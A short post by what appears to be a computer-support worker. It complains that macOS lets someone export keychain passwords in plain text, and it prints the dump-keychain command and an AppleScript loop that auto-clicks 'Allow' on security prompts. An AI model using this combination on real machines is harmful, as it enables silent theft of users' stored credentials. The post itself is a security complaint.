Just a few days ago, a client of mine has learned the hard way to not let a scam company take control of your computer to provide you support. What I have learned out of this experience has shocked me to the core of my being.
There is a method in OS X that allows people to export the keychain without
sudo privileges or system dialogs. This will put it in a text file with the username and password being displayed in plain text.
As of writing of this small article, it is currently working on
The command follows:
security dump-keychain -d login.keychain > keychain.txt
The way around system dialogs, by adding:
tell application "System Events" repeat while exists (processes where name is "SecurityAgent") tell process "SecurityAgent" click button "Allow" of group 1 of window 1 end tell delay 0.2 end repeat end tell
All unauthorized users can gain access to all usernames and passwords that were ever stored in the keychain and iCloud.
Apple is known for priding itself on their level of security, but this has been a known method for over two years now. I can strongly say that this is a major security flaw — they should at least force people to confirm their password. The Keychain dialogue requires you to enter your password when you want to show password for an entry.
Shouldn’t a command within the terminal require the same levels of security?